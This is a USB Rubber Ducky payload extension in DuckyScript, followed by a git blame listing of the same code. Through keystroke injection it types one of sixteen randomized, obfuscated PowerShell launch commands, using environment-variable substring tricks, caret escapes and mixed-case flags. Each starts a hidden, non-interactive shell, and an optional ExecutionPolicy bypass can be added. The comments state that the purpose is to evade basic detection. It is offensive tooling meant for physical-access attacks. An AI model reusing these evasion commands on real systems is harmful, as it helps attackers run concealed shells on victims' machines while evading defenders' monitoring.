usbrubberducky-payloads/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION

EXTENSION ROLLING_POWERSHELL_EXECUTION
    REM VERSION 1.0
    REM Author: 0i41E
    REM OS: Windows
    REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
    REM Requirements: PayloadStudio v.1.3 minimum
    REM Starts Powershell in uncommon ways to avoid basic detection
    REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.

    REM CONFIGURATION:
    REM Add ExecutionPolicy bypass
    DEFINE #EXECUTIONPOLICY FALSE
    DEFINE #DELAY 200

    $_RANDOM_MIN = 1
    $_RANDOM_MAX = 16
    VAR $RANDOM_PS = $_RANDOM_INT
    FUNCTION Rolling_Powershell_Execution()
        IF ($RANDOM_PS == 1) THEN
            STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
        ELSE IF ($RANDOM_PS == 2) THEN
            STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
        ELSE IF ($RANDOM_PS == 3) THEN
            STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
        ELSE IF ($RANDOM_PS == 4) THEN
            STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
        ELSE IF ($RANDOM_PS == 5) THEN
            STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
        ELSE IF ($RANDOM_PS == 6) THEN
            STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
        ELSE IF ($RANDOM_PS == 7) THEN
            STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
        ELSE IF ($RANDOM_PS == 8) THEN
            STRING powershell -NoPro -noninT -win h
        ELSE IF ($RANDOM_PS == 9) THEN
            STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
        ELSE IF ($RANDOM_PS == 2) THEN
            STRING powershell.exe -NoP -nOni -W h
        ELSE IF ($RANDOM_PS == 10) THEN
            STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
        ELSE IF ($RANDOM_PS == 11) THEN
            STRING powershell -nopr -noninT -W HiddEn
        ELSE IF ($RANDOM_PS == 12) THEN
            STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
        ELSE IF ($RANDOM_PS == 13) THEN
            STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
        ELSE IF ($RANDOM_PS == 14) THEN
            STRING powershell -noproF -noni -W Hi
        ELSE IF ($RANDOM_PS == 15) THEN
            STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
        ELSE ($RANDOM_PS == 16) THEN
            STRING powershell.exe -noP -nOnI -windo H
        END_IF


    IF_DEFINED_TRUE #EXECUTIONPOLICY
        SPACE
        IF (($RANDOM_PS % 2) == 0) THEN
            STRING -ep ByPasS
        ELSE IF (($RANDOM_PS % 5) == 0) THEN
            STRING -exec bypass
        ELSE IF (($RANDOM_PS % 7) == 0) THEN
            STRING -exeC byPasS
        ELSE IF (($RANDOM_PS % 10) == 0) THEN
            STRING -exEcUtionPoL bYpaSs
        ELSE IF (($RANDOM_PS % 12) == 0) THEN
            STRING -exEcUtion bYPaSs
        ELSE
            STRING -eP BYPaSs
        END_IF
    END_IF_DEFINED
    ENTER
    DELAY #DELAY
    END_FUNCTION
    REM EXAMPLE USAGE AFTER EXTENSION
    REM DELAY 2000
    REM GUI r
    REM DELAY 2000
    REM Rolling_Powershell_Execution()
END_EXTENSION
Update and rename Rolling_Powershell_Execution to ROLLING_POWERSHELL_EXECUTION 2023-10-18 06:33:20 +00:00			`EXTENSION ROLLING_POWERSHELL_EXECUTION`
Created Extension: Rolling_Powershell_Execution Start Powershell in different ways through obfuscation, uncommon start paramters and randomisation. This extension may help to evade basic and bad detection methods of starting powershell. 2023-02-17 11:58:11 +00:00			`REM VERSION 1.0`
Changed Username 2024-05-28 17:25:26 +00:00			`REM Author: 0i41E`
Update Rolling_Powershell_Execution 2023-08-28 12:18:31 +00:00			`REM OS: Windows`
Created Extension: Rolling_Powershell_Execution Start Powershell in different ways through obfuscation, uncommon start paramters and randomisation. This extension may help to evade basic and bad detection methods of starting powershell. 2023-02-17 11:58:11 +00:00			`REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek`
			`REM Requirements: PayloadStudio v.1.3 minimum`
			`REM Starts Powershell in uncommon ways to avoid basic detection`
			`REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.`

			`REM CONFIGURATION:`
			`REM Add ExecutionPolicy bypass`
			`DEFINE #EXECUTIONPOLICY FALSE`
			`DEFINE #DELAY 200`

Update Rolling_Powershell_Execution Updated formatting so extension can be properly collapsed 2023-02-24 11:13:00 +00:00			`$_RANDOM_MIN = 1`
			`$_RANDOM_MAX = 16`
			`VAR $RANDOM_PS = $_RANDOM_INT`
			`FUNCTION Rolling_Powershell_Execution()`
			`IF ($RANDOM_PS == 1) THEN`
			`STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"`
			`ELSE IF ($RANDOM_PS == 2) THEN`
			`STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"`
			`ELSE IF ($RANDOM_PS == 3) THEN`
			`STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"`
			`ELSE IF ($RANDOM_PS == 4) THEN`
			`STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^\|findstr PSM')DO %a -nop -noni /w H"`
			`ELSE IF ($RANDOM_PS == 5) THEN`
			`STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"`
			`ELSE IF ($RANDOM_PS == 6) THEN`
			`STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"`
			`ELSE IF ($RANDOM_PS == 7) THEN`
			`STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"`
			`ELSE IF ($RANDOM_PS == 8) THEN`
			`STRING powershell -NoPro -noninT -win h`
			`ELSE IF ($RANDOM_PS == 9) THEN`
			`STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"`
			`ELSE IF ($RANDOM_PS == 2) THEN`
			`STRING powershell.exe -NoP -nOni -W h`
			`ELSE IF ($RANDOM_PS == 10) THEN`
			`STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^\|findstr PSM')DO %a -nop -noni -w H"`
			`ELSE IF ($RANDOM_PS == 11) THEN`
			`STRING powershell -nopr -noninT -W HiddEn`
			`ELSE IF ($RANDOM_PS == 12) THEN`
			`STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^\|findstr PSM')DO %a -noProF -nonin -win Hi"`
			`ELSE IF ($RANDOM_PS == 13) THEN`
			`STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"`
			`ELSE IF ($RANDOM_PS == 14) THEN`
			`STRING powershell -noproF -noni -W Hi`
			`ELSE IF ($RANDOM_PS == 15) THEN`
			`STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"`
			`ELSE ($RANDOM_PS == 16) THEN`
			`STRING powershell.exe -noP -nOnI -windo H`
			`END_IF`
Created Extension: Rolling_Powershell_Execution Start Powershell in different ways through obfuscation, uncommon start paramters and randomisation. This extension may help to evade basic and bad detection methods of starting powershell. 2023-02-17 11:58:11 +00:00
1.3.0 updates 2023-03-14 22:19:57 +00:00
			`IF_DEFINED_TRUE #EXECUTIONPOLICY`
Update Rolling_Powershell_Execution Updated formatting so extension can be properly collapsed 2023-02-24 11:13:00 +00:00			`SPACE`
			`IF (($RANDOM_PS % 2) == 0) THEN`
			`STRING -ep ByPasS`
			`ELSE IF (($RANDOM_PS % 5) == 0) THEN`
			`STRING -exec bypass`
			`ELSE IF (($RANDOM_PS % 7) == 0) THEN`
			`STRING -exeC byPasS`
			`ELSE IF (($RANDOM_PS % 10) == 0) THEN`
			`STRING -exEcUtionPoL bYpaSs`
			`ELSE IF (($RANDOM_PS % 12) == 0) THEN`
			`STRING -exEcUtion bYPaSs`
			`ELSE`
			`STRING -eP BYPaSs`
			`END_IF`
			`END_IF_DEFINED`
			`ENTER`
			`DELAY #DELAY`
			`END_FUNCTION`
Created Extension: Rolling_Powershell_Execution Start Powershell in different ways through obfuscation, uncommon start paramters and randomisation. This extension may help to evade basic and bad detection methods of starting powershell. 2023-02-17 11:58:11 +00:00			`REM EXAMPLE USAGE AFTER EXTENSION`
			`REM DELAY 2000`
			`REM GUI r`
			`REM DELAY 2000`
			`REM Rolling_Powershell_Execution()`
			`END_EXTENSION`